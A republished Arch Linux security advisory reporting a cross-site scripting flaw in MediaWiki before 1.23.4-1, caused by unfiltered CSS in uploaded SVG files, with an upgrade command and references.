ArchLinux: 201409-4: mediawiki: Cross-site Scripting (XSS)

    Date29 Sep 2014
    CategoryArchLinux
    86
    Posted ByLinuxSecurity Advisories
    The package mediawiki before version 1.23.4-1 is vulnerable to Cross-site Scripting (XSS).
    Arch Linux Security Advisory ASA-201409-4
    =========================================
    
    Severity: High
    Date    : 2014-09-29
    CVE-ID  : CVE-7199
    Package : mediawiki
    Type    : Cross-site Scripting (XSS)
    Remote  : Yes
    Link    : https://wiki.archlinux.org/index.php/CVE-2014
    
    Summary
    =======
    
    The package mediawiki before version 1.23.4-1 is
    vulnerable to Cross-site Scripting (XSS).
    
    Resolution
    ==========
    
    Upgrade to 1.23.4-1.
    
    # pacman -Syu "mediawiki>=1.23.4-1"
    
    The problem has been fixed upstream in version 1.23.4.
    
    Workaround
    ==========
    
    None.
    
    Description
    ===========
    
    It was discovered that MediaWiki, a wiki engine, did not sufficiently
    filter CSS in uploaded SVG files, allowing for cross site scripting.
    
    Impact
    ======
    
    A remote attacker is able to upload a crafted SVG file to perform a
    cross site scripting attack.
    
    References
    ==========
    
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7199
    https://bugzilla.wikimedia.org/show_bug.cgi?id=69008
    https://bugs.archlinux.org/task/42161
    https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-September/000161.html
    
    
    You are not authorised to post comments.

    LinuxSecurity Poll

    Do you reuse passwords across multiple accounts?

    No answer selected. Please try again.
    Please select either existing option or enter your own, however not both.
    Please select minimum 0 answer(s) and maximum 2 answer(s).
    /component/communitypolls/?task=poll.vote
    13
    radio
    [{"id":"55","title":"Yes","votes":"2","type":"x","order":"1","pct":100,"resources":[]},{"id":"56","title":"No","votes":"0","type":"x","order":"2","pct":0,"resources":[]}]["#ff5b00","#4ac0f2","#b80028","#eef66c","#60bb22","#b96a9a","#62c2cc"]["rgba(255,91,0,0.7)","rgba(74,192,242,0.7)","rgba(184,0,40,0.7)","rgba(238,246,108,0.7)","rgba(96,187,34,0.7)","rgba(185,106,154,0.7)","rgba(98,194,204,0.7)"]350
    bottom200

    We use cookies to provide and improve our services. By using our site, you consent to our Cookie Policy.